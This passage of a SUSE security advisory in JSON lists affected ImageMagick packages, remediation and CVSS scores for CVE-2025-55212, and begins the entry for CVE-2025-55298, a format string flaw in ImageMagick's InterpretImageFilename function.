"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55212",
"url": "https://www.suse.com/security/cve/CVE-2025-55212"
},
{
"category": "external",
"summary": "SUSE Bug 1248767 for CVE-2025-55212",
"url": "https://bugzilla.suse.com/1248767"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:01:34Z",
"details": "moderate"
}
],
"title": "CVE-2025-55212"
},
{
"cve": "CVE-2025-55298",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55298"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to ImageMagick versions 6.9.13-28 and 7.1.2-2, a format string bug vulnerability exists in InterpretImageFilename function where user input is directly passed to FormatLocaleString without proper sanitization. An attacker can overwrite arbitrary memory regions, enabling a wide range of attacks from heap overflow to remote code execution. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
